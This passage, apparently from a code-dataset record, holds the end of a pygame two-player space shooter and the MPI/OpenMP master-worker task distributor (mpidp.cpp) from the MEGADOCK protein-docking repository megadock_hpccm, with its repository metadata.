OBSTACLE_TYPE_2_ROWS,\n \"columns\": OBSTACLE_TYPE_2_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y,\n \"left\": OBSTACLE_BOUNDS_MIN_X + 0.5 * (OBSTACLE_BOUNDS_MAX_X - OBSTACLE_BOUNDS_MIN_X) - 0.5 * OBSTACLE_TYPE_2_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_2_ROWS,\n \"columns\": OBSTACLE_TYPE_2_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_TYPE_2_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MIN_X + 0.5 * (OBSTACLE_BOUNDS_MAX_X - OBSTACLE_BOUNDS_MIN_X) - 0.5 * OBSTACLE_TYPE_2_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_2_ROWS,\n \"columns\": OBSTACLE_TYPE_2_COLUMNS\n }\n ]\n]\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, name, key_move_up, key_move_down):\n pygame.sprite.Sprite.__init__(self)\n self.width = PLAYER_WIDTH\n self.height = PLAYER_HEIGHT\n self.color = COLOR_HP_3\n self.image = pygame.Surface((self.width, self.height))\n self.rect = self.image.get_rect()\n self.speed = PLAYER_SPEED\n self.direction_y = 0\n self.name = name\n self.key_move_up = key_move_up\n self.key_move_down = key_move_down\n self.hit_points = 3\n\n def update(self, keys, *args):\n if keys[self.key_move_up]:\n self.rect.y -= self.speed\n if keys[self.key_move_down]:\n self.rect.y += self.speed\n\n self.check_bounds()\n self.image.fill(self.color)\n\n def check_bounds(self):\n if self.rect.top < BOUNDS_MIN_Y:\n self.rect.top = BOUNDS_MIN_Y\n self.direction_y = 0\n elif self.rect.bottom > BOUNDS_MAX_Y:\n self.rect.bottom = BOUNDS_MAX_Y\n self.direction_y = 0\n\n def compute_hit(self):\n if self.hit_points > 0:\n self.hit_points -= 1\n\n if self.hit_points == 2:\n self.color = COLOR_HP_2\n elif self.hit_points == 1:\n self.color = COLOR_HP_1\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, rect, color, direction_x, speed):\n pygame.sprite.Sprite.__init__(self)\n self.width = BULLET_WIDTH\n self.height = BULLET_HEIGHT\n self.color = color\n self.image = pygame.Surface((self.width, self.height))\n self.image.fill(self.color)\n self.rect = self.image.get_rect()\n self.rect.centery = rect.centery\n self.rect.left = rect.left + BULLET_MARGIN\n self.name = BULLET_NAME\n self.direction_x = direction_x\n self.speed = speed\n\n def update(self, *args):\n self.rect.x += self.direction_x * self.speed\n\n if self.rect.left < 0 or self.rect.right > SCREEN_WIDTH:\n self.kill()\n\n\nclass Obstacle(pygame.sprite.Sprite):\n def __init__(self, left, top, color):\n pygame.sprite.Sprite.__init__(self)\n self.width = OBSTACLE_WIDTH\n self.height = OBSTACLE_HEIGHT\n self.color = color\n self.image = pygame.Surface((self.width, self.height))\n self.image.fill(self.color)\n self.rect = self.image.get_rect()\n self.name = OBSTACLE_NAME\n self.rect.top = top\n self.rect.left = left\n\n\nclass Text:\n def __init__(self, font, size, message, color, rect):\n self.font = pygame.font.Font(font, size)\n self.color = color\n self.set_message(message)\n self.rect = self.surface.get_rect()\n self.rect.centerx = rect.centerx\n self.rect.centery = rect.centery\n\n def draw(self, surface):\n surface.blit(self.surface, self.rect)\n\n def set_message(self, message):\n self.surface = self.font.render(message, True, self.color)\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n self.display_screen, self.display_rect = self.make_screen()\n self.intro_sound = pygame.mixer.Sound('assets/intro.wav')\n self.laser_sound = pygame.mixer.Sound('assets/laser.ogg')\n self.block_kill_sound = pygame.mixer.Sound('assets/block_kill.wav')\n self.player_hit_sounds = [\n pygame.mixer.Sound('assets/player_hit_0_hp.wav'),\n pygame.mixer.Sound('assets/player_hit_1_hp.wav'),\n pygame.mixer.Sound('assets/player_hit_2_hp.wav')\n ]\n # Initialize flags to new game state\n self.game_over_state = False\n self.new_game_state = True\n self.game_started_state = False\n\n def make_screen(self):\n # Create screen and its rectangle for display\n pygame.display.set_caption(GAME_TITLE)\n display_screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n display_rect = display_screen.get_rect()\n display_screen.fill(COLOR_BACKGROUND)\n display_screen.convert()\n return display_screen, display_rect\n\n def make_players(self):\n # Create players\n player_1 = Player(PLAYER_1_NAME, PLAYER_1_KEY_UP, PLAYER_1_KEY_DOWN)\n player_2 = Player(PLAYER_2_NAME, PLAYER_2_KEY_UP, PLAYER_2_KEY_DOWN)\n # Position them on their initial positions\n player_1.rect.top = BOUNDS_MIN_Y\n player_1.rect.left = BOUNDS_MIN_X\n player_2.rect.bottom = BOUNDS_MAX_Y\n player_2.rect.right = BOUNDS_MAX_X\n\n return player_1, player_2\n\n def make_obstacles(self):\n obstacle_group = pygame.sprite.Group()\n # Load one of the levels and its obstacles\n level = LEVELS[randint(0, 1)]\n for obstacle in level:\n obstacle_group.add(self.make_obstace_group(obstacle[\"top\"], obstacle[\"left\"], obstacle[\"rows\"], obstacle[\"columns\"]))\n return obstacle_group\n\n def make_obstace_group(self, top, left, rows, columns):\n obstacle_group = pygame.sprite.Group()\n for row in range(rows):\n for column in range(columns):\n x = left + column * OBSTACLE_WIDTH\n y = top + row * OBSTACLE_HEIGHT\n obstacle = Obstacle(x, y, COLOR_OBSTACLE)\n obstacle_group.add(obstacle)\n return obstacle_group\n\n def check_input(self):\n for event in pygame.event.get():\n # Update value of keys to pass it along to sprites later\n self.keys = pygame.key.get_pressed()\n if event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == PLAYER_1_KEY_SHOOT and len(self.player_1_bullets) < PLAYER_MAX_BULLETS:\n # Pew pew\n self.laser_sound.play()\n # Add bullet to sprite groups with the correct speed and direction\n bullet = Bullet(self.player_1.rect, COLOR_PLAYER_1_BULLET, PLAYER_1_BULLET_DIRECTION_X, BULLET_SPEED)\n self.player_1_bullets.add(bullet)\n self.all_bullets.add(bullet)\n self.all_sprites.add(bullet)\n elif event.key == PLAYER_2_KEY_SHOOT and len(self.player_2_bullets) < PLAYER_MAX_BULLETS:\n self.laser_sound.play()\n bullet = Bullet(self.player_2.rect, COLOR_PLAYER_2_BULLET, PLAYER_2_BULLET_DIRECTION_X, BULLET_SPEED)\n self.player_2_bullets.add(bullet)\n self.all_bullets.add(bullet)\n self.all_sprites.add(bullet)\n\n def check_game_over_input(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.KEYUP:\n # Update flags to new game state\n self.new_game_state = True\n self.game_started_state = False\n self.game_over_state = False\n\n def check_game_to_start_input(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.KEYUP:\n # Update flags to game started state\n self.new_game_state = False\n self.game_started_state = True\n self.game_over_state = False\n self.intro_sound.play()\n\n def check_collisions(self):\n hits_bullets_1 = pygame.sprite.groupcollide(self.player_1_bullets, self.all_obstacles, True, False)\n hits_bullets_2 = pygame.sprite.groupcollide(self.player_2_bullets, self.all_obstacles, True, False)\n # Check collisions between each player's bullets and obstacles\n for bullet, obstacles in hits_bullets_1.items():\n closest = obstacles[0]\n for obstacle in obstacles:\n # Get the topmost and leftmost obstacle to remove\n if obstacle.rect.left < closest.rect.left and obstacle.rect.top < closest.rect.top:\n closest = obstacle\n closest.kill()\n for bullet, obstacles in hits_bullets_2.items():\n closest = obstacles[0]\n for obstacle in obstacles:\n # Gett the topmost and rightmost obstacle to remove\n if obstacle.rect.left > closest.rect.left and obstacle.rect.top < closest.rect.top:\n closest = obstacle\n closest.kill()\n # Check collisions between bullets and players\n for bullet in self.player_1_bullets:\n if pygame.sprite.collide_rect(bullet, self.player_2):\n # Handle each hit's effect on player and bullet\n self.player_2.compute_hit()\n # Play relevant sound effect (according to player HP)\n self.player_hit_sounds[self.player_2.hit_points].play()\n bullet.kill()\n for bullet in self.player_2_bullets:\n if pygame.sprite.collide_rect(bullet, self.player_1):\n self.player_1.compute_hit()\n self.player_hit_sounds[self.player_1.hit_points].play()\n bullet.kill()\n\n def check_game_over(self):\n if self.player_1.hit_points == 0 or self.player_2.hit_points == 0:\n # Update flags to game over state\n self.game_over_state = True\n self.new_game_state = False\n self.game_started_state = False\n self.handle_game_over()\n\n def handle_game_over(self):\n subtitle = \"\"\n if self.player_1.hit_points == self.player_2.hit_points:\n subtitle = \"Both players lose\"\n elif self.player_1.hit_points > 0:\n subtitle = \"{} wins\".format(self.player_1.name)\n else:\n subtitle = \"{} wins\".format(self.player_2.name)\n # Update game over subtitle with game ending message (according to winners/losers)\n self.game_over_subtitle = Text(\n 'assets/arcadeclassic.ttf',\n SUBTITLE_TEXT_SIZE,\n subtitle,\n WHITE,\n self.display_rect\n )\n self.game_over_subtitle.rect.top = self.game_over_title.rect.bottom + TITLE_SUBTITLE_MARGIN\n\n def quit(self):\n pygame.quit()\n sys.exit()\n\n def setup_game(self):\n # Set up text elements\n self.intro_title = Text(\n 'assets/arcadeclassic.ttf',\n TITLE_TEXT_SIZE,\n 'Space Skirmishers',\n WHITE,\n self.display_rect\n )\n self.intro_subtitle = Text(\n 'assets/arcadeclassic.ttf',\n SUBTITLE_TEXT_SIZE,\n 'Press any key to start game',\n WHITE,\n self.display_rect\n )\n self.intro_subtitle.rect.top = self.intro_title.rect.bottom + TITLE_SUBTITLE_MARGIN\n self.game_over_title = Text(\n 'assets/arcadeclassic.ttf',\n TITLE_TEXT_SIZE,\n 'Game over',\n WHITE,\n self.display_rect\n )\n # Set up sprites\n self.player_1, self.player_2 = self.make_players()\n self.player_1_bullets = pygame.sprite.Group()\n self.player_2_bullets = pygame.sprite.Group()\n self.all_bullets = pygame.sprite.Group(self.player_1_bullets, self.player_2_bullets)\n self.obstacle_group_1 = self.make_obstacles()\n self.all_obstacles = pygame.sprite.Group(self.obstacle_group_1)\n self.all_sprites = pygame.sprite.Group(self.player_1, self.player_2, self.all_obstacles, self.all_bullets)\n # Set up timing and inputs\n self.fps = 30\n self.keys = pygame.key.get_pressed()\n self.clock = pygame.time.Clock()\n # Set up flags\n self.new_game_state = True\n self.game_started_state = False\n self.game_over_state = False\n\n def main_loop(self):\n while True:\n if self.new_game_state:\n self.setup_game()\n self.game_over_state = False\n # Handle events\n self.check_game_to_start_input()\n # Draw surface\n self.display_screen.fill(COLOR_BACKGROUND)\n self.intro_title.draw(self.display_screen)\n self.intro_subtitle.draw(self.display_screen)\n # Show surface\n pygame.display.update()\n elif self.game_over_state:\n # Handle events\n self.check_game_over_input()\n # Draw surface\n self.display_screen.fill(COLOR_BACKGROUND)\n self.game_over_title.draw(self.display_screen)\n self.game_over_subtitle.draw(self.display_screen)\n # Show surface\n pygame.display.update()\n elif self.game_started_state:\n current_time = pygame.time.get_ticks()\n # Handle events\n self.check_input()\n self.check_game_over()\n # Draw surface\n self.display_screen.fill(COLOR_BACKGROUND)\n # Update game elements\n self.all_sprites.update(self.keys, current_time)\n self.check_collisions()\n # Drawing surface\n self.all_sprites.draw(self.display_screen)\n # Show surface\n pygame.display.update()\n\n self.clock.tick(self.fps)\n\n\nif __name__ == \"__main__\":\n game = Game()\n game.main_loop()\n" } ]
1
akiyamalab/megadock_hpccm
https://github.com/akiyamalab/megadock_hpccm
7a361c558616b097595be626df735a24b17f2240
48e356f51b012faa59c2187c301d7c8569662d05
36716fcd4d4a2dc34bc31fde31c1e27cf06215e2
refs/heads/master
2020-10-01T08:54:03.743500
2019-12-24T08:02:08
2019-12-24T08:02:08
227,503,169
1
0
Apache-2.0
2019-12-12T02:29:17
2019-12-18T07:49:22
2019-12-18T09:10:48
C++
[ { "alpha_fraction": 0.4348600208759308, "alphanum_fraction": 0.44910311698913574, "avg_line_length": 30.913352966308594, "blob_id": "a862e21adaf90d547f55070442a8678fcd50d91c", "content_id": "597e4c7f55e117b9d999186c4814fbad131f0148", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 22467, "license_type": "permissive", "max_line_length": 144, "num_lines": 704, "path": "/megadock-scfa20/mpidp.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Mpidp\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"mpidp.h\"\n\n#define LASTUPDATED \"2014/4/30\"\n#define MASTER_PROCESS_ID 0\n#define MASTER_THREAD_ID 0\n\n#ifndef SYSTEMCALL\nint application(int argc,char *argv[]);\n#endif\n\n//============================================================================//\nint main(int argc,char *argv[])\n//============================================================================//\n{\n Mpidp\t\tmpidp;\n ofstream\tlogout;\t\t\t\t// log file stream\n double stime, etime;\n int \t\tnproc, myid, resultlen;\t\t// for MPI parameters\n char\t\thostname[MPI_MAX_PROCESSOR_NAME];\n \n struct timeval et1, et2;\n // Preparation using MPI\n MPI_Init(&argc,&argv);\n stime = MPI_Wtime();\n MPI_Comm_size(MPI_COMM_WORLD,&nproc);\n MPI_Comm_rank(MPI_COMM_WORLD,&myid);\n MPI_Get_processor_name(hostname,&resultlen);\n char *hostall = new char [nproc*MPI_MAX_PROCESSOR_NAME];\n MPI_Gather(hostname,MPI_MAX_PROCESSOR_NAME,MPI_CHAR,\n hostall,MPI_MAX_PROCESSOR_NAME,MPI_CHAR,\n 0,MPI_COMM_WORLD);\n\n // for master process\n if( myid == MASTER_PROCESS_ID ){\n gettimeofday(&et1,NULL);\n string log_file = \"./master.log\";\t\t// Default log file name\n for( int i = 1 ; i < argc ; i++ ) {\n if( !strncmp(argv[i],\"-lg\",3) ) {\n log_file = argv[++i];\n }\n }\n \n logout.open(log_file.c_str());\n if( !logout ) {\n cerr << \"[ERROR] Log file [\" << log_file << \"] was not opened!!\" << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n exit(1);\n }\n \n logout << \" MEGADOCK ver. 4.0 Master Process\"<< endl;\n logout << \" [email protected] last updated: \"\n << LASTUPDATED << endl << endl;\n logout << \"#RANK = \" << nproc << endl;\n \n int nprocess = 1;\t\t\t\t// # of processes in one core\n string *shost = new string[nproc];\t\t// Hostname\n shost[0] = &hostall[0];\n for( int i = 1 ; i < nproc ; i++ ) {\n shost[i] = &hostall[i*MPI_MAX_PROCESSOR_NAME];\n if( shost[i] == shost[0] ) {\n nprocess ++;\n }\n else {\n break;\n }\n }\n logout << \"#Node = \" << nproc/nprocess\n << \" (#RANK/Node = \" << nprocess << \")\" << endl;\n \n logout << \"\\n used nodes list(id) :\";\n for( int i = 0 ; i < nproc ; i++ ) {\n if( i % 5 == 0 ) {\n logout << endl;\n }\n logout << \" \" << &hostall[i*MPI_MAX_PROCESSOR_NAME] << \"(\" << i << \")\";\n }\n logout << endl << endl;\n logout.flush();\n delete [] shost;\n }\n \n if( myid == MASTER_PROCESS_ID ) {\t\t\t// for master\n //int ntry;\t\t\t\t// Upper limit of the number of retries\n int eflag;\t\t\t\t// return flag\n \n // Read command options and JOB list\n mpidp.read_table(argc,argv,logout);\n \n eflag = mpidp.master0(argc, argv, nproc);\t// = 0 (MPI_Finalize) or 1 (MPI_Abort)\n }\n else {\t\t\t\t// for workers\n mpidp.worker(myid,hostname,argc,argv);\n }\n \n etime = MPI_Wtime();\n\n printf(\"\\nTotal time (process %5d) = %8.2f sec.\\n\", myid, etime - stime);\n\n MPI_Barrier(MPI_COMM_WORLD);\n MPI_Finalize();\n \n if( myid == MASTER_PROCESS_ID ) {\n gettimeofday(&et2,NULL);\n const float total_time = (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n logout << \"\\nElapsed time = \" << total_time << \" sec.\" << endl;\n printf(\"\\nTotal time (entire process) = %8.2f sec.\\n\", total_time);\n }\n \n return 0;\n}\n\n\n//============================================================================//\nvoid Mpidp::read_table(int argc,char *argv[],ofstream &logout)\n// Read command options and JOB list\n//============================================================================//\n{\n int\t\tcsize = 0;\n int\t\tndata = 0;\n string\ttable;\n \n _Title = \"MasterProc\"; // TITLE (initialization)\n _Param = \"MPIDP\";\t\t\t// PARAM data (initialization)\n _Psize = _Param.size() + 1;\n _Smallest_chunk_size = 1;\n _Largest_chunk_size = LONG_MAX;\n _Out_option = 0;\n //_Ntry = 0; // Number retrying limit\n _Worker_life = 3;\t\t\t// Worker life (default=3)\n \n // for MPIDP options\n for( int i = 1 ; i < argc ; i++ ) {\n if( !strncmp(argv[i],\"-tb\",3) ) {\n _Table_file = argv[++i];\n logout << \"Table file : -tb \" << _Table_file << endl;\n }\n else if( !strncmp(argv[i],\"-ch\",3) ) {\n _Smallest_chunk_size = atoi(argv[++i]);\n if (_Smallest_chunk_size <= 0) {\n cerr << \"[ERROR] Smallest chunk size must be a positive integer!\" << endl;\n exit(1);\n }\n logout << \"Smallest chunk size : -ch \" << _Smallest_chunk_size << endl;\n }\n else if( !strncmp(argv[i],\"-lc\",3) ) {\n _Largest_chunk_size = atoi(argv[++i]);\n if (_Largest_chunk_size <= 0) {\n cerr << \"[ERROR] Largest chunk size must be a positive integer!\" << endl;\n exit(1);\n }\n logout << \"Largest chunk size : -ic \" << _Largest_chunk_size << endl;\n }\n else if( !strncmp(argv[i],\"-ot\",3) ) {\n _Out_option = atoi(argv[++i]);\n logout << \"Output option : -ot \" << _Out_option << endl;\n }\n else if( !strncmp(argv[i],\"-wl\",3) ) {\n _Worker_life = atoi(argv[++i]);\n logout << \"Worker life : -wl \" << _Worker_life << endl;\n }\n else if( !strncmp(argv[i],\"-pg\",3) ) {\n logout << \"Program name : -pg \" << argv[++i] << endl;\n }\n else if( !strncmp(argv[i],\"-lg\",3) ) {\n logout << \"Log file : -lg \" << argv[++i] << endl;\n }\n }\n if (_Smallest_chunk_size > _Largest_chunk_size) {\n cerr << \"[ERROR] Largest chunk size cannot be smaller than smallest chunk size!\" << endl;\n exit(1);\n }\n \n // for other(application's) options\n int oflag = 0;\n for( int i = 1 ; i < argc ; i++ ) {\n if( !strncmp(argv[i],\"-tb\",3) ||\n !strncmp(argv[i],\"-ch\",3) ||\n !strncmp(argv[i],\"-lc\",3) ||\n !strncmp(argv[i],\"-ot\",3) ||\n !strncmp(argv[i],\"-rt\",3) ||\n !strncmp(argv[i],\"-wl\",3) ||\n !strncmp(argv[i],\"-pg\",3) ||\n !strncmp(argv[i],\"-lg\",3) ) {\n i++;\n }\n else {\n if( oflag == 0 ) {\n logout << \"Other options :\";\n oflag = 1;\n }\n logout << \" \" << argv[i];\n }\n }\n \n if( oflag == 1 ) {\n logout << endl;\n }\n logout << endl;\n \n // open JOB list file\n ifstream Input(_Table_file.c_str(),ios::in);\n if( !Input ) {\n cerr << \"[ERROR] Table file [\" << _Table_file\n << \"] was not opened!!\" << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n exit(1);\n }\n\n _Num_pair = 0;\n\n // read JOB list file (calculate csize)\n while(1) {\n if( !getline(Input,table) ) break;\n \n table = erase_space(table,7);\n \n if( !strncmp(table.c_str(),\"TITLE=\",6) ||\n !strncmp(table.c_str(),\"Title=\",6) ||\n !strncmp(table.c_str(),\"title=\",6) ) {\n _Title = table.substr(6);\n logout << \"TITLE=\" << _Title << endl;\n }\n else if( !strncmp(table.c_str(),\"PARAM=\",6) ||\n !strncmp(table.c_str(),\"Param=\",6) ||\n !strncmp(table.c_str(),\"param=\",6) ) {\n _Param = table.substr(6);\n _Psize = _Param.size() + 1;\n logout << \"PARAM=\" << _Param << endl;\n }\n else {\n csize = (table.size() > csize) ? table.size() : csize;\n _Num_pair++;\n }\n }\n \n logout << endl;\n Input.close();\n _Csize = csize + 1;\n \n int line_index = 0;\n _Table_list.reserve((long) _Csize * _Num_pair);\n \n ifstream Input2(_Table_file.c_str(),ios::in);\n if( !Input2 ) {\n cerr << \"[ERROR] Table file [\" << _Table_file\n << \"] was not opened!!\" << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n exit(1);\n }\n\n // read JOB list file (read lines)\n while(1) {\n if( !getline(Input2,table) ) break;\n \n table = erase_space(table,7);\n \n if( strncmp(table.c_str(),\"TITLE=\",6) &&\n strncmp(table.c_str(),\"Title=\",6) &&\n strncmp(table.c_str(),\"title=\",6) &&\n strncmp(table.c_str(),\"PARAM=\",6) &&\n strncmp(table.c_str(),\"Param=\",6) &&\n strncmp(table.c_str(),\"param=\",6) )\n {\n copy(table.begin(), table.begin() + _Csize, back_inserter(_Table_list));\n _Table_list.back() = 0;\n }\n }\n Input2.close();\n\n for( int i = 0 ; i < _Csize; i++ ) {\n if( _Table_list[i] == '\\t' ) {\n ndata ++;\n }\n }\n \n // According to _Name data\n _Ndata = ndata + 1;\n \n //ntry = _Ntry;\n \n return;\n}\n\n//============================================================================//\nstring Mpidp::erase_space(const string &s0,const int ip)\n// Deletion of spaces\n//============================================================================//\n{\n int \tn;\n string\ts1;\n \n s1 = s0;\n \n while(1) {\n n = s1.find(\" \");\n \n if( n == std::string::npos ) {\n break;\n }\n else if( n < ip ) {\n s1.erase(n,1);\n }\n else {\n break;\n }\n }\n \n return s1;\n}\n\n//============================================================================//\nint Mpidp::master0(int argc, char *argv[], const int &nproc)\n// master process for NO retry\n//============================================================================//\n{\n int\twid;\t\t\t\t// Worker id\n int\t\tnproc2;\n \n#ifdef _OPENMP\n #pragma omp parallel\n {\n nproc2 = omp_get_num_threads();\n if(omp_get_thread_num() == 0) {\n cout << \"# Using OpenMP parallelization: \" << nproc2 << \" threads.\" << endl;\n }\n }\n //printf(\"#OpenMP version %d\\n\", _OPENMP);\n#else\n nproc2 = 1;\n#endif //#ifdef _OPENMP\n\n char\t*param = new char[_Psize];\t// for PARAM data\n \n strcpy(param,_Param.c_str());\n \n // The calculation condition is sent to workers. \n for( int i = 1 ; i < nproc ; i++ ) {\n MPI_Send(&_Psize,1,MPI_INT,i,100,MPI_COMM_WORLD);\n MPI_Send(param,_Psize,MPI_CHAR,i,200,MPI_COMM_WORLD);\n MPI_Send(&_Csize,1,MPI_INT,i,300,MPI_COMM_WORLD);\n MPI_Send(&_Ndata,1,MPI_INT,i,400,MPI_COMM_WORLD);\n MPI_Send(&_Out_option,1,MPI_INT,i,420,MPI_COMM_WORLD);\n }\n\n\n /*\n const long rem = _Num_pair % nproc;\n const long quo = _Num_pair / nproc;\n _Tlist_size = quo * _Csize;\n int begin_index = 0;\n vector<MPI_Request> reqs(nproc - 1);\n vector<MPI_Status> stats(nproc - 1);\n for (int i = 0; i < nproc - 1; i++) {\n const long tlist_size = _Tlist_size + ((i < rem) ? _Csize : 0);\n MPI_Send(&tlist_size, 1, MPI_LONG, i + 1, 430, MPI_COMM_WORLD);\n MPI_Isend(_Table_list.data() + begin_index + _Tlist_size , tlist_size, MPI_CHAR, i + 1, 450, MPI_COMM_WORLD, &reqs[i]);\n begin_index += tlist_size;\n }\n\n\n MPI_Waitall(nproc - 1, &reqs[0], &stats[0]);\n\n _Table_list.resize(_Tlist_size);\n _Table_list.shrink_to_fit();\n */\n\n // Correction of a bug\n int arglen = max(_Csize,_Psize);\n for( int i = 0 ; i < argc ; i++ ) {\n if( strlen(argv[i]) >= arglen ) {\n arglen = strlen(argv[i]) + 1;\n }\n }\n // Bug fix\n int nwargv = argc + _Ndata*2;\n for( int i = 1 ; i < _Psize-2 ; i++ ) {\n if( param[i] == ' ' ) nwargv++;\n }\n\n _App = new Application(nproc2);\n _App->initialize();\n\n#pragma omp parallel\n {\n int myid2 = omp_get_thread_num();\n if (myid2 == 0)\n master_thread(nproc);\n else\n worker_thread(nwargv, arglen, argc, argv, MASTER_PROCESS_ID, myid2);\n }\n delete [] param;\n delete _App;\n\n return 0;\n}\n\n//============================================================================//\nvoid Mpidp::worker(int &myid,char *hostname,int argc,char *argv[])\n// worker process for function call\n//============================================================================//\n{\n int\t\tnproc2;\n \n#ifdef _OPENMP\n #pragma omp parallel\n {\n nproc2 = omp_get_num_threads();\n if(omp_get_thread_num() == 0) {\n cout << \"# Using OpenMP parallelization: \" << nproc2 << \" threads.\" << endl;\n }\n }\n //printf(\"#OpenMP version %d\\n\", _OPENMP);\n#else\n nproc2 = 1;\n#endif //#ifdef _OPENMP\n \n MPI_Recv(&_Psize,1,MPI_INT,MASTER_PROCESS_ID,100,MPI_COMM_WORLD,&_Status);\n char *param = new char[_Psize];\n MPI_Recv(param,_Psize,MPI_CHAR,MASTER_THREAD_ID,200,MPI_COMM_WORLD,&_Status);\n _Param = param;\n \n if( !strncmp(param,\"MPIDP\",5) ) {\n cerr << \"[ERROR] [PARAM=] was not found in table file!!\" << endl;\n exit(1);\n }\n \n MPI_Recv(&_Csize,1,MPI_INT,MASTER_PROCESS_ID,300,MPI_COMM_WORLD,&_Status);\n MPI_Recv(&_Ndata,1,MPI_INT,MASTER_PROCESS_ID,400,MPI_COMM_WORLD,&_Status);\n MPI_Recv(&_Out_option,1,MPI_INT,MASTER_PROCESS_ID,420,MPI_COMM_WORLD,&_Status);\n \n // Correction of a bug\n int arglen = max(_Csize,_Psize);\n for( int i = 0 ; i < argc ; i++ ) {\n if( strlen(argv[i]) >= arglen ) {\n arglen = strlen(argv[i]) + 1;\n }\n }\n // Bug fix\n int nwargv = argc + _Ndata*2;\n for( int i = 1 ; i < _Psize-2 ; i++ ) {\n if( param[i] == ' ' ) nwargv++;\n }\n\n /*\n MPI_Recv(&_Tlist_size, 1, MPI_LONG, MASTER_PROCESS_ID, 430, MPI_COMM_WORLD, &_Status);\n _Table_list.resize(_Tlist_size);\n MPI_Recv((void*)_Table_list.data(), _Tlist_size, MPI_CHAR, MASTER_PROCESS_ID, 450, MPI_COMM_WORLD, &_Status);\n */\n _App = new Application(nproc2);\n _App->initialize();\n\n#pragma omp parallel\n {\n int myid2 = omp_get_thread_num();\n worker_thread(nwargv, arglen, argc, argv, myid, myid2);\n }\n \n delete [] param;\n delete _App;\n \n return;\n}\n\n//============================================================================//\nvoid Mpidp::master_thread(const int nproc)\n//============================================================================//\n{\n int countdown = nproc - 1;\n bool end_flag = false;\n\n while (countdown > 0) {\n int child_id;\n MPI_Recv(&child_id, 1, MPI_INT, MPI_ANY_SOURCE, 500, MPI_COMM_WORLD, &_Status); // receive a request from a child process\n\n#pragma omp critical (distribute0)\n {\n if (!has_next_task() && !get_end_flag()) {\n end_flag_on();\n }\n if (get_end_flag()) {\n long send_size = 1;\n MPI_Send(&send_size, 1, MPI_LONG, child_id, 600, MPI_COMM_WORLD); // send 1\n char end_char = '\\0';\n MPI_Send(&end_char, 1, MPI_CHAR, child_id, 700, MPI_COMM_WORLD); // send 0 (end of file message)\n countdown--;\n } else {\n const long table_list_size = _Table_list.size() / _Csize; \n const long chunk_size = min(_Largest_chunk_size, max(_Smallest_chunk_size, table_list_size / nproc));\n long send_size = min(chunk_size * _Csize, (long) _Table_list.size());\n MPI_Send(&send_size, 1, MPI_LONG, child_id, 600, MPI_COMM_WORLD); // send number of tasks to send\n MPI_Send(_Table_list.data() + _Table_list.size() - send_size, send_size, MPI_CHAR, child_id, 700, MPI_COMM_WORLD); // send tasks\n _Table_list.resize(_Table_list.size() - send_size);\n _Table_list.shrink_to_fit();\n }\n }\n }\n}\n\n//============================================================================//\nvoid Mpidp::worker_thread(const int nwargv, const int arglen, const int argc, char *argv[], const int myid, const int myid2)\n//============================================================================//\n{\n struct timeval et3, et4;\n int\t\twargc;\t\t// # of application command line parameters\n char **wargv;\n\n#pragma omp critical (alloc)\n {\n wargv = new char*[nwargv];\n for( int i = 0 ; i < nwargv ; i++ ) {\n wargv[i] = new char[arglen];\n }\n }\n int argc2 = argument(argc,argv,wargv); // # of mpidp comand line parameters\n\n gettimeofday(&et3,NULL);\n\n while(1) {\n\n#pragma omp critical (distribute0)\n {\n if (!has_next_task() && !get_end_flag()) {\n if (myid == 0) {\n end_flag_on();\n } else {\n request_tasks(myid);\n }\n }\n if (!get_end_flag()) {\n char ctable[_Csize];\n strncpy(ctable, _Table_list.data() + _Table_list.size() - _Csize, _Csize);\n\n wargc = for_worker(ctable,argc2,wargv);\n _Table_list.resize(_Table_list.size() - _Csize);\n _Table_list.shrink_to_fit();\n }\n }\n if (get_end_flag()) break;\n\n try {\n throw _App->application(wargc,wargv,myid2);\t// application's main function\n }\n catch(int e) {\n if (e) {\n cerr << \"_App->application was not successfully finished\" << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n }\n }\n catch(char *e) {\n cerr << \"[ERROR] [application] exception : \" << e << endl;\n MPI_Abort(MPI_COMM_WORLD,1);\n }\n\n }\n delete [] wargv;\n\n gettimeofday(&et4,NULL);\n const float total_time = (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n printf(\"\\nTotal time ([proc / thread] %5d / %2d) = %8.2f sec.\\n\", myid, myid2, total_time);\n}\n\n\n//============================================================================//\nint Mpidp::argument(int argc,char *argv[],char **wargv)\n// Procedure of options for function call version\n//============================================================================//\n{\n int ic = 0;\n \n for( int i = 0 ; i < argc ; i++ ) {\n if( !strncmp(argv[i],\"-tb\",3) ||\n !strncmp(argv[i],\"-ch\",3) ||\n !strncmp(argv[i],\"-lc\",3) ||\n !strncmp(argv[i],\"-ot\",3) ||\n !strncmp(argv[i],\"-rt\",3) ||\n !strncmp(argv[i],\"-wl\",3) ||\n !strncmp(argv[i],\"-lg\",3) ) {\n i++;\n }\n else {\n strcpy(wargv[ic++],argv[i]);\n }\n }\n \n return ic;\n}\n\n//============================================================================//\nint Mpidp::argument(int 